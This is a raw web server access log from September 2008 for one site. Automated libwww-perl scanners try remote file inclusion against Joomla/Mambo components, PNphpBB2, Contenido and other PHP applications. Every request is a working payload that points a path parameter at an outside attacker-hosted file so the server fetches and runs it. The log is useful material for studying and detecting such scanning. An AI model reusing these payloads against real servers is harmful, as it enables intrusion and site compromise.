209.216.227.32 - - [12/Sep/2008:09:51:48 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.23.190 - - [12/Sep/2008:09:51:49 -0700] "GET /logs/access_080815.log%20%20//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:51:52 -0700] "GET /logs/access_080319.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:51:52 -0700] "GET /logs/access_080319.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:52:02 -0700] "GET /logs/access_080428.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:52:02 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:52:02 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:52:09 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:52:09 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.251.34 - - [12/Sep/2008:09:52:15 -0700] "GET /logs/access_080330.log/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:09:52:15 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:09:52:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:09:52:16 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.251.34 - - [12/Sep/2008:09:52:17 -0700] "GET /index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89402 "-" "libwww-perl/5.810" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:09:52:18 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.251.34 - - [12/Sep/2008:09:52:18 -0700] "GET /logs/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.227.32 - - [12/Sep/2008:09:52:18 -0700] "GET /logs/access_080626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.171.225.234 - - [12/Sep/2008:09:52:18 -0700] "GET /logs/access_080623.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [12/Sep/2008:09:52:19 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [12/Sep/2008:09:52:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [12/Sep/2008:09:52:20 -0700] "GET /logs/access_080525.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:52:23 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:52:23 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:52:38 -0700] "GET /index.php?option=com_easybook&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89434 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:52:39 -0700] "GET /logs/access_080511.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
222.231.24.38 - - [12/Sep/2008:09:52:49 -0700] "GET /index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89423 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:09:52:54 -0700] "GET /logs/access_080629.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:09:52:55 -0700] "GET /index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89044 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:09:52:57 -0700] "GET /logs/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:53:08 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:53:08 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:53:09 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 200 89524 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:53:09 -0700] "GET /logs/access_071228.log//gallery.php?config[theme_dir]=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:53:25 -0700] "GET /logs/access_080629.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:53:27 -0700] "GET /index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89044 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:53:28 -0700] "GET /logs/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:53:31 -0700] "GET /logs/access_080626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:53:38 -0700] "GET /logs/access_080428.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.74.198.93 - - [12/Sep/2008:09:53:38 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:53:38 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.74.198.93 - - [12/Sep/2008:09:53:39 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:53:39 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.74.198.93 - - [12/Sep/2008:09:53:39 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.198.93 - - [12/Sep/2008:09:53:40 -0700] "GET /logs/access_080205.log/akocomments.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:09:53:50 -0700] "GET /logs/access_080319.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:53:58 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:53:58 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:53:58 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:54:02 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:54:02 -0700] "GET /logs/index.php?pag=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:54:03 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 200 89558 "-" "libwww-perl/5.812" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:54:03 -0700] "GET /index.php?pag=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 200 89097 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:54:03 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:54:11 -0700] "GET /logs/access_080421.log/config/dbutil.bck.php?confdir=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:54:13 -0700] "GET /config/dbutil.bck.php?confdir=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:54:15 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:54:18 -0700] "GET /logs/access_080501.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.227.32 - - [12/Sep/2008:09:54:28 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.227.32 - - [12/Sep/2008:09:54:28 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:54:36 -0700] "GET /logs/access_080319.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:54:41 -0700] "GET /logs/access_080512.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:54:46 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:09:54:53 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.172.9.3 - - [12/Sep/2008:09:54:53 -0700] "GET /logs/access_080326.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://vnc2008.webcindario.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.172.9.3 - - [12/Sep/2008:09:54:53 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://vnc2008.webcindario.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.172.9.3 - - [12/Sep/2008:09:54:53 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://vnc2008.webcindario.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.172.9.3 - - [12/Sep/2008:09:54:53 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://vnc2008.webcindario.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:09:54:53 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:09:54:53 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:55:01 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:55:01 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:55:02 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:55:02 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:55:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:55:04 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:55:04 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:55:05 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:55:15 -0700] "GET /index.php?option=com_gallery&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89429 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.102.132 - - [12/Sep/2008:09:55:35 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
70.85.102.132 - - [12/Sep/2008:09:55:36 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 200 89493 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.85.102.132 - - [12/Sep/2008:09:55:38 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/linasuci/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:09:55:38 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:09:55:38 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:09:55:38 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.102.132 - - [12/Sep/2008:09:55:38 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/linasuci/test.txt??? HTTP/1.1" 200 89499 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:09:55:39 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:55:46 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:55:47 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:55:47 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:55:48 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:55:50 -0700] "GET /logs/access_080830.log/index2.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:55:50 -0700] "GET /logs/access_080830.log/index2.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:55:50 -0700] "GET /logs/access_080824.log/index2.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:55:50 -0700] "GET /logs/access_080824.log/index2.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:55:58 -0700] "GET /logs/access_080516.log/config/dbutil.bck.php?confdir=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:09:56:06 -0700] "GET /logs/access_080612.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.180.251.34 - - [12/Sep/2008:09:56:12 -0700] "GET /logs/access_080330.log/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:09:56:15 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:09:56:15 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:09:56:15 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:09:56:15 -0700] "GET /logs/access_080311.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:56:16 -0700] "GET /logs/access_080603.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:56:16 -0700] "GET /logs/access_080603.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [12/Sep/2008:09:56:16 -0700] "GET /logs/access_080604.log/index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:56:18 -0700] "GET /index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89074 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:56:18 -0700] "GET /index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89042 "-" "libwww-perl/5.805" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:09:56:31 -0700] "GET /logs/access_080404.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:09:56:31 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:09:56:31 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
